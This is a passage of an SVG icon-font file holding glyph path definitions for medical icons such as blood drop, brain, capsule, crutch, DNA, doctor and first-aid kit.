1-14z m6 44c-4-5-10-5-14-2-4 3-5 9-2 13 3 5 10 5 14 2 4-3 5-9 2-13z m8 48c-3-5-9-6-14-2-4 3-4 9-1 13 3 4 9 5 13 2 4-3 5-9 2-13z m32-80c-3-4-9-5-13-1-5 3-5 9-2 13 3 4 9 5 13 2 5-4 5-10 2-14z m82 154c3 4 9 4 13 1 5-3 5-9 2-13-3-4-9-5-13-2-5 3-5 9-2 14z m-35 27c3 4 9 5 13 1 4-3 5-9 2-13-3-4-9-5-13-2s-5 10-2 14z m-6-49c3 4 9 5 13 2 5-4 5-10 2-14-3-4-9-5-13-2-4 4-5 10-2 14z m-4-52c4 4 10 5 14 2 4-3 5-9 2-14-4-4-10-5-14-1-4 3-5 9-2 13z m-25 128c3 4 9 5 13 2 4-4 5-10 2-14-3-4-9-5-14-2-4 4-5 10-1 14z m-8-48c3 5 9 5 13 2 4-3 5-9 2-13-3-4-9-5-14-2-4 3-5 9-1 13z m-7-49c3 5 9 6 13 2 4-3 5-9 2-13-3-4-9-5-13-2-5 3-5 9-2 13z m5-46c4-3 5-9 2-13-4-4-10-5-14-2-4 3-5 9-2 14 4 4 10 5 14 1z m-25 170c3 4 9 5 13 2 4-4 5-10 2-14-3-4-10-5-14-2-4 4-5 10-1 14z m-11-46c4 5 10 5 14 2 4-3 5-9 2-13-4-5-10-5-14-2-4 3-5 9-2 13z m7-47c4-3 5-9 2-14-4-4-10-4-14-1-4 3-5 9-1 13 3 4 9 5 13 2z m-32 120c4 4 10 5 14 2 4-4 5-9 2-14-4-4-10-5-14-1-4 3-5 9-2 13z m-12-44c3 4 9 5 13 2 5-3 5-9 2-14-3-4-9-4-13-1-4 3-5 9-2 13z m-8 59c-3-4-9-4-13-1-4 3-5 9-2 13 3 4 9 5 14 2 4-3 5-9 1-14z" />
<glyph glyph-name="blind" horiz-adv-x="1000" unicode="&#xec0c;" d="M608 354c-80 96-159 194-239 290-32 38-107 29-130-13-33-58-65-117-97-175-6-12-13-23-11-38 8-54 16-108 26-161 4-21 19-32 41-28 22 3 33 16 31 38-1 11-1 22-4 32-20 71-17 139 35 198 0-50-2-101 1-151 2-60-9-116-28-172-28-83-54-167-80-251-14-47 18-81 64-71 26 6 34 28 42 49 33 91 63 184 99 274 24 62 32 124 33 190 1 61-5 114-54 154-3 3-6 6-8 9-4 6-6 13 0 18 7 6 12 0 17-5 8-9 16-18 24-27 58-69 117-138 175-208 18-22 39-32 62-15 25 18 19 41 1 63z m-205-140l-11-2c-14-41-45-85-38-122 14-75 41-149 76-218 13-26 41-26 67-14 25 13 33 34 23 60-39 99-78 197-117 296z m-89 488c44 0 76 32 75 75 0 44-32 73-77 73-44 0-77-33-76-75 1-42 34-73 78-73z m540-808l-195 339c-6 10-12 21-19 31-4 6-9 15-18 8-7-5-3-12-1-18 2-6 6-12 9-18 69-118 137-237 206-356 4-8 9-16 15-23 3-5 9-6 14-2 2 3 3 7 5 10-6 10-11 20-16 29z" />
<glyph glyph-name="blood-drop" horiz-adv-x="1000" unicode="&#xec0d;" d="M501 850c14-92 53-175 100-254 31-51 63-101 94-152 39-65 77-131 96-205 39-147-25-292-157-358-184-91-404 25-433 229-10 69 5 134 32 197 33 77 79 146 123 217 44 70 87 141 116 220 13 34 21 70 29 106z m76-913c63-1 130 60 138 124 7 55-28 91-82 83-62-8-120-70-125-133-3-43 26-74 69-74z m-178 411c1 30-18 46-40 37-25-10-42-42-37-68 4-22 24-31 44-21 21 12 31 32 33 52z" />
<glyph glyph-name="blood-test" horiz-adv-x="1000" unicode="&#xec0e;" d="M863 636c22 34 12 80-22 102l-159 101c-34 21-80 11-102-23l-27-43c0 0 0 0 0 0-34 16-74 5-95-27l-39-63c-21-32-13-74 15-97 0 0 0 0 0-1l-295-465c-19-29-14-66 8-90l-4-8c-34-52-18-122 34-155s121-17 155 35l4 7c32-10 67 2 86 31l295 466c1 0 1 0 1 0 33-16 74-5 94 27l40 63c20 32 13 74-16 97 0 0 0 0 0 0l27 43z m-50 32l-27-43c-23-37-13-62 2-72l9-5c7-5 9-14 5-21l-40-62c-4-7-13-9-20-5l-9 6c-16 10-42 8-66-29l-295-465c-4-7-14-9-20-5l-5 3c-14 9-37 9-56-21l-9-16c-16-24-48-31-73-16-25 16-32 49-16 73l9 15c19 30 10 51-4 60l-5 3c-7 4-9 13-4 20l295 466c23 37 13 61-2 71l-9 6c-7 4-9 14-4 20l39 63c5 7 14 9 21 4l9-5c15-10 42-9 65 28l27 43c5 7 14 9 21 5l158-101c7-4 9-14 4-20z m-198-171l-55 35c-13 8-32 4-41-9l-275-435c-9-13-5-32 9-41l2-1-45-71c-9-14-5-33 9-41 14-9 32-5 41 9l45 71 3-1c14-9 32-5 41 9l275 434c9 14 5 32-9 41z m-68-24l-259-400c-2-3-5-4-8-4-2 0-4 0-6 1-4 3-6 9-3 13l260 400c3 5 9 6 13 3 5-3 6-9 3-13z" />
<glyph glyph-name="blood" horiz-adv-x="1000" unicode="&#xec0f;" d="M801 778h-320c-4 19-11 37-23 51-13 14-29 21-48 21-24 0-45-9-59-27-10-12-16-28-20-45h-90c-14 0-26-11-26-26s12-26 26-26h87c0-8 1-16 1-22-86-1-156-72-156-158v-446c0-87 71-158 158-158h23v-48c0-6 4-13 10-15l32-14c5-2 14-2 20 0l36 13c6 2 10 9 10 15v49h23c88 0 158 71 158 158v446c0 86-69 157-156 158 0 6 0 14 0 22h288v-850c0-14 12-26 26-26 15 0 26 12 26 26v876c0 15-12 26-26 26z m-409 12c3 4 7 8 18 8 4 0 6-1 9-4 3-4 6-9 8-16h-41c1 5 3 9 6 12z m43-64c0-8 0-15-1-22h-52c-1 6-1 14-2 22h55z m-214-244c-10 0-18 8-18 18 0 96 79 175 176 175 9 0 17-8 17-17 0-10-8-18-17-18-78 0-141-63-141-140 0-10-8-18-17-18z m358-137v-216c0-68-51-124-115-124h-112c-63 0-115 56-115 124v216h342z" />
<glyph glyph-name="brain-alt" horiz-adv-x="1000" unicode="&#xec10;" d="M911 421c-2 4-3 8-3 13-8 84-49 149-120 195-6 5-10 10-13 16-24 40-53 75-90 103-62 46-117 48-174 3-11-8-18-7-29-1-68 39-132 32-190-22-29-26-54-55-73-89-3-4-6-8-11-10-53-29-89-74-114-129-11-25-20-52-13-81 1-5 0-10-2-15-13-34-17-70-16-106 0-11-1-21 0-32 3-35 10-70 31-99 8-11 11-22 14-35 15-62 46-113 101-146 14-8 27-17 39-27 43-34 90-47 144-30 5 2 10 2 16 0 27-7 54-5 79 9 9 6 16 5 25-1 28-18 57-27 90-15 5 2 10 1 15 0 61-11 116 13 147 66 5 8 11 13 18 17 44 25 81 58 101 104 14 31 29 61 38 92 23 74 24 148-10 220z m-428 208c-3-23-2-48-1-72 1-11-2-16-14-19-42-11-78-33-105-67-13-15-13-27-2-36 11-9 23-7 35 7 18 22 40 38 67 48 19 7 19 7 19-13 0-36 0-73 0-110h0c0-37-1-75 0-113 1-14-4-14-15-9-38 14-61 37-53 81 1 10 0 19 1 29 0 15-8 24-20 25-13 0-23-8-24-22-2-26-4-52 1-77 2-9-1-13-7-17-18-12-35-25-50-40-13-13-15-25-5-35 10-11 23-9 37 4 13 13 28 24 43 35 6 4 10 4 16 0 20-14 42-24 64-33 8-3 12-7 12-16 0-49 0-97 0-145 0-19-34-43-52-37-6 2-7 5-7 10-1 25-3 49-11 73-1 5 1 9 4 12 6 7 12 14 17 21 7 11 6 22-4 30-10 8-20 7-30-2 0 0-1 0-1-1-11-20-27-22-47-15-13 4-24-4-27-16-3-14 3-23 18-27 28-8 31-13 34-42 0-6 1-12 1-18 3-22-1-26-23-28-24-2-43 8-61 21-17 12-34 24-52 35-37 21-55 58-64 99-2 8 3 10 9 12 16 6 31 12 46 22 19 12 25 29 21 51-7 32-21 61-37 89-7 12-20 16-31 9-11-7-14-18-7-31 11-22 22-44 30-68 3-9 0-14-8-18l-17-7c-26-11-32-9-40 18-15 51-15 102 2 152 4 15 13 20 28 22 30 5 51-5 69-28 13-16 25-32 34-50 7-13 20-18 31-13 12 6 16 20 9 34-14 27-33 51-54 74-25 25-55 33-88 27-25-3-27-2-18 21 14 34 35 62 63 86 8 7 13 9 17-4 5-13 12-24 21-35 14-16 31-19 50-10 15 7 27 18 38 29 22 22 44 43 65 65 12 12 13 23 3 33-9 10-22 10-33-1-25-23-48-47-72-70-19-18-19-17-31 6-7 14-5 27 3 40 19 31 43 58 72 82 23 20 49 22 77 11 7-3 14-7 20-10 23-12 37-28 34-58z m371-408c-7-22-10-22-30-14-32 13-33 14-20 46 7 15 15 30 22 46 7 14 4 28-7 34-12 6-24 1-32-12-15-29-30-58-35-91-3-18 2-32 16-44 15-11 32-18 48-24 7-3 11-6 7-13-14-38-42-63-76-82-6-3-9 0-13 4-9 13-19 25-32 34-8 6-9 12-7 20 2 10 4 20 6 30 1 13-6 21-18 23-13 2-22-4-26-16-3-10 0-25-8-31-8-5-21-1-31-2-5 0-10-2-15-3-14-4-21-13-18-26 2-13 12-21 27-17 40 9 67-11 89-41 6-8 5-14 0-22-20-29-51-39-83-23-13 7-22 9-33-3-6-8-15-7-25-3-26 11-33 23-33 51 0 61 0 121 0 181 0 20 2 22 22 19 19-3 36-10 50-22 13-11 26-12 35-2 10 11 8 23-6 35-24 22-52 33-83 33-15 0-17 5-19 18-3 36 1 63 42 76 17 6 28 9 40-4 6-6 12-11 18-16 12-11 24-11 33-1 9 9 9 22-2 33-11 12-23 21-36 30-6 4-9 9-8 17 1 17 1 33 0 50-1 16-10 24-24 23s-20-9-20-25c0-9-1-18 0-27 3-23-7-37-28-45-11-5-14-4-14 8 0 35 0 69 0 104v15h0c0 38 0 75 0 113 0 10 3 18 10 25 38 40 64 42 107 9 30-23 53-52 72-84 5-8 4-12-3-18-22-16-29-17-53-4-16 10-30 22-38 40-7 15-19 20-32 13-12-6-15-18-9-32 19-40 53-63 94-75 11-3 23-1 34 4 8 5 17 10 26 15 26 19 26 19 49-5 23-24 40-52 49-84 3-10 1-15-11-13-35 3-63-11-86-37-17-20-33-40-45-64-8-15-6-29 6-35 13-6 25-1 33 14 13 25 30 47 50 66 27 23 66 13 76-21 14-49 13-99-2-148z" />
<glyph glyph-name="brain" horiz-adv-x="1000" unicode="&#xec11;" d="M782 234c15-6 39-7 51 3 17 13 28 30 34 51 25 82-32 200-62 255-8 14-27 29-42 34-72 24-86 40-84 56 1 9 7 15 16 19 14 6 27 20 26 36-2 25-10 46-24 61-28 32-77 39-114 39-13 0-26-1-38-3-16-1-29-17-29-33v-759c0-16 0-29 0-30-1-1 4-14 14-26 14-16 32-24 54-24 34 0 72 18 99 35 14 8 13 22-1 30-25 16-54 37-70 60-8 14-4 28 4 29 7 0 16-12 27-24 15-17 40-34 64-47 14-8 37-7 51 2 69 45 105 88 103 125-2 45-58 71-59 71l-14 6s-14 7-13 7c0 0-11 6-26 12-33 13-72 22-97 12-6-2-11-6-15-11-7-8-14-16-22-14-7 2-10 17 0 30 6 9 15 16 26 20 42 17 104-4 141-22z m-166 327c7-1 11-15 17-30 10-31 40-62 63-82 13-11 20-23 16-30-5-6-19-3-31 7-27 22-68 63-78 108-3 16 5 28 13 27z m-132-568v759c0 16-13 32-29 33-12 2-25 3-38 3-36 0-86-7-114-39-14-15-22-36-24-61-1-16 12-30 26-36 8-4 15-10 16-19 2-16-12-32-83-56-16-5-35-20-43-35-30-54-87-172-63-254 7-21 18-38 35-51 12-10 36-9 51-3 37 17 99 39 140 22 11-4 20-11 27-20 10-13 7-28-1-30-7-2-14 5-21 13-4 5-9 9-15 12-25 10-64 0-97-12-15-6-26-12-26-12 1-1-5-4-13-7l-14-7c-1 0-57-26-59-70-2-38 34-81 105-127 14-9 37-10 51-2 24 14 50 32 66 48 11 12 20 25 27 24 8 0 13-14 4-28-16-24-47-46-72-61-14-8-15-22-1-31 27-16 64-34 97-34 22 0 40 8 53 24 11 13 16 26 15 27 0 0 0 14 0 30z m-196 426c-4 7 3 19 16 30 23 20 53 51 63 82 5 15 10 29 17 30 8 1 16-11 13-27-10-45-51-86-78-108-12-10-27-13-31-7z" />
<glyph glyph-name="capsule" horiz-adv-x="1000" unicode="&#xec12;" d="M955 707c-23 30-51 56-79 83-83 79-218 82-303-4-169-171-340-341-511-511-71-72-83-184-26-268 26-40 61-71 95-102 40-37 89-55 136-55 68 0 117 23 159 64 170 171 340 340 510 510 7 8 15 16 21 24 58 77 58 184-2 260z m-268-504c-1-1-1-1-2-2-1 0-5 2-9 6l-321 321c-4 4-5 9-2 11 2 1 4 3 5 4 77 77 155 153 230 231 68 69 174 75 251 21 44-33 84-71 113-118 47-75 37-170-25-233-79-81-160-161-240-241z" />
<glyph glyph-name="crutch" horiz-adv-x="1000" unicode="&#xec13;" d="M544 431v-18c0-107 0-214 1-322 0-10-3-12-13-12-32 0-64 0-95 0-4 0-10 2-10-5 0-8 5-6 10-6l97 0c3 0 9 1 9-2 1-6-5-5-8-6l-98-27c-2 0-5 0-7-1-4-2-3-6-3-9 1-5 5-3 7-2 18 9 34 2 50-5 17-7 35-14 53-21 6-2 8-5 7-11-1-7-6-4-10-4-32 0-65 0-97 0-4 0-10 2-10-6 0-8 5-6 9-6 13 0 26 0 40-2-14-8-28-16-42-24-7-4-9-8-5-16 16 9 34 17 49 28 18 13 37 16 58 14 6 0 8-1 9-7 1-28 1-28-25-33-27-5-54-10-81-15-7-1-12-1-13-11-4-31-31-54-61-52-33 2-57 27-57 61 0 64 0 129 0 194 0 16 0 33 0 49 1 5-1 7-6 8-37 9-53 30-53 67 0 89 0 178 0 268 0 9 0 19 3 28 7 25 29 43 56 43 34 0 68 0 102 0 9 0 11-3 11-11-1-106-1-213 0-319 0-4 0-7 0-10 0-4 2-6 5-6 4 0 6 2 6 5 0 4 0 7 0 11 0 106 0 212 0 318 0 10 3 12 13 12 32-1 65 0 97 0 16 0 29-5 41-15 36-29 71-58 107-87 17-14 25-31 24-52 0-3 0-5 0-8 0-8-2-17 1-24 4-7 15-1 23-2 7-1 11-5 11-12 0-41 2-83-1-124-1-20-12-37-24-54-14-21-30-42-45-63-8-11-12-23-12-38 1-72 0-145 0-218 0-3 1-7 0-10-1-7-6-11-13-11-6 1-10 5-10 12-1 7-1 13-1 20 0 69 0 138 1 207 0 14-4 26-12 37-15 21-30 42-45 63-12 17-22 35-25 56-1 5-1 9-1 14 0 34 0 69 0 103 0 14 3 18 17 18 2 0 5-1 7 0 4 1 9-3 11 3 1 5-1 9-5 12-15 11-29 23-47 36z m112-296c17 25 37 48 52 73 9 15 17 29 18 46 1 32 0 63 0 95 0 5-1 7-6 7-5 0-5-3-5-7v-18c0-20 0-40-1-60 0-31-26-56-58-57-29 0-57 23-58 53-2 26-1 53-1 79 0 5 1 10-7 10-7-1-4-6-4-10-1-30 0-60 0-89 0-10 2-19 6-28 16-35 42-62 64-94z m-229 715c65 0 118-54 117-119 0-64-54-117-118-117-66 0-118 54-118 121 1 63 55 115 119 115z m46-998c14 21 28 41 43 61 6 8 17 6 26 7 3 0 2-3 2-5 5-39-33-72-71-63z m29 61c-14-20-26-37-38-54-3-4-5-3-9-1-13 8-21 20-27 34-2 6 1 8 6 9 22 4 43 8 68 12z m-28 119c23 6 44 12 64 17 5 2 6 0 6-4 0-12 0-23 0-35 0-4-1-5-5-4-21 8-42 17-65 26z" />
<glyph glyph-name="disabled" horiz-adv-x="1000" unicode="&#xec14;" d="M872 766h-744c-36 0-65-29-65-66v-700c0-36 29-66 65-66h744c36 0 66 30 66 66v700c0 37-30 66-66 66z m-262-627c-30-49-72-81-128-94-115-29-230 49-248 166-13 82 24 163 95 206 2 1 4 2 7 4 2-19 3-37 4-56 0-2-2-5-4-7-45-40-63-91-50-149 13-57 50-95 107-113 79-24 166 25 188 105 1 2 1 4 2 8 10-22 20-43 29-63 0-2-1-5-2-7z m59-39c-3 9-7 17-11 24-24 54-48 107-72 160-2 6-5 8-11 8-62 0-124 0-185 0h-9c-1 12-2 24-3 36l-10 192c0 3 0 6 0 10-1 12-2 22-14 31-26 19-27 56-6 80 23 25 60 27 86 5 23-21 25-58 3-82-4-4-9-8-14-11-4-2-5-4-5-9 2-36 4-72 6-110h139v-51h-136c1-13 1-25 3-36 0-2 4-3 7-3 25-1 50-1 75-1 31 0 63 0 94 1 8 0 11-3 15-10 23-53 47-105 70-158 2-2 3-4 4-8 18 8 35 16 53 24 7-16 14-31 21-47-33-15-66-29-100-45z" />
<glyph glyph-name="dna-alt-1" horiz-adv-x="1000" unicode="&#xec15;" d="M619 506c-71-6-143-13-217-20 15-15 29-27 44-38 6-5 7-8-1-13-25-16-50-33-75-49-4-3-7-5-11-1-54 48-105 99-130 169-17 45-18 91-10 137 5 25 28 41 55 40 23-1 45-21 46-45 1-10 4-10 12-8 87 24 173 48 260 71 6 2 8 3 3 9-19 28-15 60 8 79 23 19 57 17 79-6 40-40 76-83 95-137 25-71 14-138-23-203-26-47-65-83-108-115-64-47-133-89-198-134-25-17-49-35-70-57-1-1-2-2-5-6 77 7 152 14 226 20 2 5-2 6-4 8-14 12-27 25-41 36-5 5-6 7 0 11 26 17 52 34 77 51 4 3 7 4 11 1 52-48 102-98 129-166 18-47 18-94 4-141-8-24-27-38-52-38-22 0-42 16-48 39-2 9-6 9-13 7-59-17-119-33-179-49-25-7-50-14-74-21-6-1-9-2-6-10 9-28 0-54-23-69-24-14-52-10-72 11-38 41-72 84-88 138-21 73-6 141 33 204 32 51 78 87 126 120 54 38 109 74 164 111 24 16 48 33 70 53 3 3 6 5 9 7-1 2-2 3-3 4z m-283-483c5-13 12-23 18-33 4-7 9-8 17-6 97 23 195 46 292 69 19 4 20 6 17 24-2 14-2 14-16 11l-197-39c-44-8-87-17-131-26z m299 681c0 0-2 0-4-1l-292-69c-22-5-22-5-18-27 1-8 4-11 13-9 64 13 127 25 191 38 43 8 87 17 130 26 7 1 13 2 7 11-6 9-12 18-17 27-2 3-4 6-10 4z m23-573c-2 4-3 7-5 9-14 24-14 24-42 20-83-13-166-25-248-37-32-4-32-4-37-35 0-1 0-2 0-2-2-7 1-9 8-8 12 2 24 4 36 6 96 16 191 31 288 47z m-315 424c6-8 11-15 15-22 5-6 10-8 18-7 87 12 173 23 260 35 33 5 32 5 38 37 2 8 1 12-9 10-27-5-55-9-83-14-57-9-114-18-171-27-22-4-44-8-68-12z" />
<glyph glyph-name="dna-alt-2" horiz-adv-x="1000" unicode="&#xec16;" d="M198 119c24-24 48-48 72-72 9 32 7 65 5 97-3 61-9 121 2 182 22 123 132 232 255 249 75 10 55 13 63-53 1-15 7-33-2-44-8-11-27-5-41-8-7-1-13-3-25-7 28-27 54-52 79-76 11-11 12 0 13 7 8 40 5 80 2 120-4 66-8 131 12 194 15 48 41 90 77 125 20 21 50 22 72 4 21-17 26-47 7-71-10-13-8-20 3-31 33-31 65-63 97-96 8-9 14-10 24-2 27 20 58 16 75-6 19-25 15-53-10-77-57-54-125-81-202-86-15-1-21 2-21 18 0 22-1 44-4 66-2 18 5 24 22 23 7 0 14-1 17 1-21 22-42 43-62 63-10-49-1-103 2-156 7-119-27-220-122-296-53-42-114-63-181-67-13 0-19 2-19 17 0 24-2 49-4 73-1 12 3 16 15 17 16 1 31 4 47 6 11 2 13 6 5 15-27 27-53 54-82 84-9-25-12-46-12-67-2-65 8-130 4-195-4-79-35-146-89-202-21-22-51-23-74-5-20 16-25 44-8 69 7 11 5 16-4 24-34 33-67 66-99 100-9 9-15 10-25 3-25-16-53-11-69 10-18 22-17 51 4 72 58 58 130 87 212 91 10 1 15-2 16-13 0-25 2-50 4-75 1-14-3-20-17-19-11 0-23 0-34-6z m352 160c-36 36-73 73-110 108-5 5-10 18-18 5-6-9-25-17-8-33 28-27 55-55 82-82 25-25 25-25 54 2z m47 54c1 6-2 9-4 11-33 33-65 67-98 99-14 13-23-5-32-11-11-8 1-13 6-17 30-31 61-62 93-93 5-5 10-16 17-12 8 5 13 16 18 23z m-451-228c-5-3-13-5-17-11-4-7 5-10 9-14 31-31 62-61 92-93 15-16 18-5 23 6 4 6 1 11-4 16-30 30-61 61-91 91-3 3-5 6-12 5z m608 615c-5-13-19-21-9-32 30-32 61-62 93-93 9-9 17 1 24 4 6 3 4 7 0 11-36 36-71 72-108 110z" />
<glyph glyph-name="dna" horiz-adv-x="1000" unicode="&#xec17;" d="M721 604c0 30 1 60 4 90 5 40 21 76 45 109 1 2 2 7 1 9-12 12-24 24-37 38-11-15-21-29-29-44-41-74-45-153-39-234 3-44 7-88 7-132 2-60-15-114-54-161-3-4-6-7-8-10-64 64-127 127-190 190 21 18 44 34 71 44 2 1 7 0 9-2 34-34 68-67 102-101 12-12 24-24 38-38 3 14 5 25 8 37 1 7-1 11-5 16-32 31-64 63-95 95-2 2-5 4-7 6l1 4h105c-2 20-3 38-5 58-16 0-32 0-48 0-44 0-87-6-127-23-99-43-192-143-192-295 0-57 4-113 6-170 2-49-2-98-23-144-8-20-20-39-30-57 13-13 26-26 39-39 2 3 5 6 7 9 44 59 63 126 63 199 0 49-3 99-5 149-2 51-1 101 17 150 9 26 24 50 40 70 64-63 126-126 189-188-21-18-46-32-73-41-3-1-9 0-11 3-34 34-68 68-102 102-9 9-18 18-29 28-3-14-4-26-7-38-1-7 1-12 6-17 28-28 56-56 84-84 2-2 4-4 6-7l0-2c-32-1-64-2-96-4 1-18 2-36 3-55 15 0 29 0 43 0 55 0 108 8 156 34 115 64 174 160 171 292-1 52-7 103-9 154z m-468-605c0 4-1 10-4 13-22 22-44 44-66 66-14 14-29 28-44 43 40 10 79 10 119 9-1 19-2 37-3 56-93 4-179-11-255-71 12-12 24-23 35-34 4-5 7-4 13-1 13 9 28 16 42 25 5 3 9 1 13-3 41-41 82-82 122-123 6-5 11-10 18-17 4 14 7 25 10 37z m708 622c-17-10-34-19-51-29-6-3-10-2-14 3-28 28-57 56-85 85-17 17-34 35-53 54-4-14-7-25-10-36-2-7 0-12 5-17 27-26 54-53 80-80 8-8 17-15 25-23 0-1-1-2-2-3-36-7-73-8-111-5 2-20 4-38 5-57 92-5 177 10 250 69-13 13-26 26-39 39z" />
<glyph glyph-name="doctor-alt" horiz-adv-x="1000" unicode="&#xec18;" d="M719 211c19-53 1-97-30-137-6-7-17-14-8-25 31-40 35-90 47-136 4-15 15-28 0-42-10-9-21-10-32-2-16 12-9 26-4 42 28 83-49 170-134 153-22-4-45-7-60-28-7-11-19-12-30-5-9 6-14 14-13 26 1 11 8 21 18 21 55-4 109 29 164 3 17-9 25 1 35 13 51 65 38 121-47 164 53 42 85 91 102 151 2 8 4 15 13 21 44 25 47 67 32 108-9 24-7 45-4 69 9 68-2 144-61 176-53 29-111 66-178 67-61 1-120-11-176-33-89-33-134-101-129-196 2-33 6-65-5-99-11-33-4-68 30-91 6-4 11-10 13-16 17-65 52-117 107-161-16-6-28-10-38-16-41-22-50-60-48-102 0-32-3-64 42-76 35-8 45-47 29-77-17-33-56-44-88-26-31 18-39 54-20 85 7 11 24 18 19 36-13 41-8 83 1 131-117-75-187-171-200-306-5-51-5-53 48-53 187 0 374 0 561 0 74 0 148 0 223 1 19 0 36-2 37 27 9 121-96 285-216 333z m-55 288c-1-36-30-63-67-62-35 1-64 30-64 66 0 36 33 67 70 65 35-2 62-33 61-69z m-56 137c4-16 7-28 10-43-39-1-71-14-95-47-17-25-45-14-71 26 51 21 107 28 156 64z m-202-70c29-1 54-32 54-66-1-37-29-64-66-63-37 0-67 32-66 68 1 36 35 62 78 61z m23-351c9 40-23 50-47 66-40 27-66 66-84 111-10 26-6 57-43 74-21 10-18 48-3 71 13 19 39 11 59 15 13 2 6-16 3-24-9-33-4-63 20-88 22-23 51-33 82-24 34 11 54 35 63 70 3 12-5 32 19 30 23-1 16-20 18-32 11-48 57-80 102-69 45 10 75 61 64 106-4 14-9 26-16 44 30-3 42-29 72-28 17 1 13-33 10-53-1-13-5-31-25-26-17 5-16-5-17-15-13-74-48-134-114-173-9-6-14-12-16-23-10-52-91-81-134-48-6 4-13 12-13 16z m-152-239c24-14 48-8 59 20 10 26-1 42-29 47 14-12 28-24 16-44-6-12-18-19-32-14-25 8-21 29-21 49-19-21-20-43 7-58z" />
<glyph glyph-name="doctor" horiz-adv-x="1000" unicode="&#xec19;" d="M850-106c-4 39-5 77-9 116-5 57-14 115-31 170-9 30-23 56-51 72-26 16-55 25-85 34-10 3-8-4-7-9 2-25 0-50-5-75-2-7 1-11 8-15 28-16 45-41 47-74 1-34-6-68-8-102-1-23-4-46-13-68-12-26-32-36-60-31-10 2-17 7-16 19 2 11 10 15 21 13 13-3 20 3 26 14 4 8 6 16 6 24 4 39 8 77 12 115 2 35-16 61-47 68-32 8-59-7-72-39-11-26-19-53-29-79-6-15-11-30-14-45-4-20 0-28 19-36 9-4 13-11 10-20-3-10-10-12-20-11-27 6-43 25-43 53 0 12 2 23 5 34 12 41 28 80 43 120 15 35 43 55 81 57 8 1 11 3 13 10 4 25 5 49 3 73-1 12-6 18-18 20-10 2-19 5-29 9-9 4-13 2-16-8-11-38-27-74-45-109-9-17-19-33-31-53-4 25-8 46-12 67-2 10-2 18 2 27 3 5 9 11 3 17-10 9-21 16-31 24 0 1-2 0-2-1-10-8-22-16-30-26-4-6 5-14 7-21 0-2 1-4 1-5-4-26-9-52-13-80-4 4-5 5-6 7-27 43-48 87-64 135-4 10-3 25-12 28-7 3-19-5-29-8-5-1-10-3-12-9-4-12-9-23-12-35-18-77-14-153 10-228 4-11 8-17 21-20 25-5 38-32 30-56-9-25-36-37-60-26-24 11-34 40-20 62 5 8 4 14 2 22-26 72-33 147-21 223 3 18 9 35 13 53-35-10-69-18-99-36-22-13-39-30-49-54-12-30-19-60-24-91-14-72-18-146-24-218-1-20 8-33 23-42h739c19 9 26 23 24 44z m-559 616c7-2 10-6 13-12 15-36 34-71 62-99 22-23 48-40 81-43 41-5 73 14 100 41 29 29 48 63 64 100 2 5 2 11 10 12 27 2 49 45 44 72-1 7-4 14-12 15-10 0-9 6-7 12 5 23 8 46 9 65 0 21-1 37-5 53-7 24-19 45-42 57-13 7-23 14-28 29-2 6-7 10-12 14-17 14-38 20-59 23-65 6-124-8-177-45-37-26-62-60-67-106-3-30-2-60 4-90 1-6 4-13-7-13-6 0-9-4-11-9-9-27 13-69 40-76z" />
<glyph glyph-name="drug-pack" horiz-adv-x="1000" unicode="&#xec1a;" d="M759 850h-519c-31 0-56-25-56-56v-888c0-31 25-56 56-56h519c31 0 56 25 56 56v888c0 31-25 56-56 56z m-441-179c30 30 79 29 109-1 12-13 19-29 21-46h-153c2 17 10 34 23 47z m129-69c-3-15-10-29-22-41-30-29-79-29-108 2-11 11-18 25-21 39h151z m-128-176c30 29 79 29 109-2 12-13 19-29 21-46l-153 0c2 18 9 35 23 48z m129-70c-3-15-10-29-22-40-30-30-79-29-109 1-10 11-17 25-20 40l151-1z m-21-286c-30-30-79-29-109 2-11 11-17 25-20 39l151 0c-3-15-10-29-22-41z m-130 63c2 17 9 34 23 47 30 30 79 29 108-1 13-13 20-30 22-46h-153z m291 538c30 30 79 29 108-1 13-13 20-29 22-46l-153 0c2 17 9 34 23 47z m129-69c-3-15-10-29-22-41-31-29-79-29-109 2-11 11-18 25-20 39h151z m-129-176c31 29 80 29 109-2 13-13 20-29 21-46l-152 0c1 18 9 35 22 48z m130-70c-3-15-11-29-22-40-31-30-79-29-109 1-11 11-18 25-20 40l151-1z m-21-286c-31-30-80-29-109 2-11 11-18 25-21 39l151 0c-2-15-10-29-21-41z m-130 63c1 17 9 34 22 47 31 30 79 29 109-1 13-13 20-30 21-46h-152z" />
<glyph glyph-name="drug" horiz-adv-x="1000" unicode="&#xec1b;" d="M996 120c-28-79-198-139-388-139-190 0-359 60-387 139-5 12-4 12-4-1v-87c0-90 183-162 391-162 208 0 392 72 392 162v87c0 13 0 13-4 1z m-600-87c61-17 133-27 212-27 213 0 386 73 386 162 0 38-31 73-84 100-11 6-30 6-42 1l-473-220c-12-5-12-13 1-16z m-174 135c0-35 26-67 71-94 11-6 30-6 42-1l471 218c12 6 11 13-1 16-58 15-125 23-197 23-214 0-386-73-386-162z m175 167c67 17 146 27 231 27 14 0 28 0 42-1 11 0 22 7 25 18 10 31 15 65 15 99 0 181-134 329-308 352-13 1-24-8-24-21v-460c0-10 9-17 19-14z m-83-27c10 4 18 16 18 27v474c0 13-11 23-23 21-175-23-309-171-309-352 0-124 65-234 162-297 9-6 16-9 16-8 0 0 0 1 0 2 0 52 52 99 136 133z" />
<glyph glyph-name="first-aid-alt" horiz-adv-x="1000" unicode="&#xec1c;" d="M912 607h-149c-9 0-17 8-17 18v146c0 10-8 18-18 18h-456c-10 0-18-8-18-18v-146c0-10-7-18-17-18h-149c-49 0-88-39-88-87v-498c0-48 39-87 88-87h42v-5c0-10 16-18 35-18h142c19 0 35 8 35 18v5h330v-5c0-10 16-18 35-18h142c19 0 35 8 35 18v5h28c49 0 88 39 88 87v498c0 48-39 87-88 87z m-508 79c0 10 7 18 17 18h158c10 0 18-8 18-18v-61c0-10-8-18-18-18h-37v1c0 9-8 17-17 17h-50c-10 0-18-8-18-17v-1h-36c-10 0-17 8-17 18v61z m230-456c0-4-4-8-9-8h-71c-5 0-9-4-9-9v-71c0-5-3-8-8-8h-60c-4 0-8 3-8 8v71c0 5-4 9-9 9h-71c-5 0-8 4-8 8v60c0 5 3 9 8 9h71c5 0 9 3 9 8v71c0 5 4 9 8 9h60c5 0 8-4 8-9v-71c0-5 4-8 9-8h71c5 0 9-4 9-9v-60z" />
